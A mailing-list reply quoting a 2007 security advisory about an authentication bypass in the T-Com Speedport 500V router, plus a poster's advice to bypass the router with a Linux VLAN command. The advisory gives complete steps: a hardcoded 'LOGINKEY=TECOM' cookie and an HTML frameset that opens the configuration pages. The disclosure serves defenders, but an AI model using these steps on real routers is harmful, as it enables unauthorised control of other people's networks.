<<< Date Index >>>     <<< Thread Index >>>

Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass



Since this is not the first security problem on this router, and Deutsche Telekom really does not care, I advice everyone to use alternative means of routing / dialing up. The modem shipped in conjunction with this router requires VLAN support. Dialup requests will only be served on VLAN.7

More information can be found on man-wiki, althought it deals with the 700V, which has the same security problems, it also applies to the 500V version. <a href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V";>man-wiki</a> and <a href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge";>man-wiki</a>

On Linux a "vconfig add eth0 7" will allow you to dial up without the Speedport 500V

Regards,
<a href="http://www.mohammadkhani.eu/";>Amir Mohammadkhani</a>



advisory07@xxxxxxx schrieb:
- - - --------------------------------------------------------------------
Virginity Security Advisory 2007-001
- - - --------------------------------------------------------------------
             DATE : 2007-01-19 15:32 GMT
             TYPE : remote
VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
           AUTHOR : Virginity
  ADVISORY NUMBER : 005
- - - --------------------------------------------------------------------


Description:

The Speedport 500V is a broadband-router which is sold in germany along
with ADSL lines. (just so you know)

The system is stupid and verifies wether you have entered the correct
password by setting a cookie with the content LOGINKEY=TECOM
(this is hardcoded and can not be changed)
If an attacker simply creates this cookie he can bypass password authentication by simply calling the configuration html sites directly.

The attacker then has nearly full system access (you cannot change the
system password without knowing the old one) and can change system
configuration e.g. disable the firewall. You can also perform a firmware
upgrade, which allows you to reset the password to the default one, which
now gives you full system access.

Vendor has not been notified. I don't think they care^^.

- - - --------------------------------------------------------------------


Example:

Create a cookie like this:

Name: LOGINKEY
Content: TECOM
Host: <ipaddress> <- replace this by your routers ipaddress ;)
Path: /
Expires: Never

create a html page like this and open it in your browser:

<html>
<frameset rows="44,*" border=0 frameborder=0 framespacing=0">
<frame src="http://<ipaddress>/b_banner.htm" name="banner"> <frameset cols="170,*" border=0 frameborder=0 framespacing=0>
<frame src="http://<ipaddress>/m_startseite.htm" name="menu">
<frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti"> </frameset>
</frameset>
</html>

this will bypass the login screen and lead you directly to configuration menu.

- - - --------------------------------------------------------------------


Workaround:

Download the Sourcecode from the vendor (GPL), replace TECOM with something
else, try bulding it, and then try installing it on the hardware.
i did not try this. its stupid and does not really solve the problem.

- - - --------------------------------------------------------------------


Personal note:

Still here... sadly not dead yet. maybe i should hack the NSA so they kill
me? *lol* guess i'd have to learn some real things.... greetz to s.
and that other admin.

- - - --------------------------------------------------------------------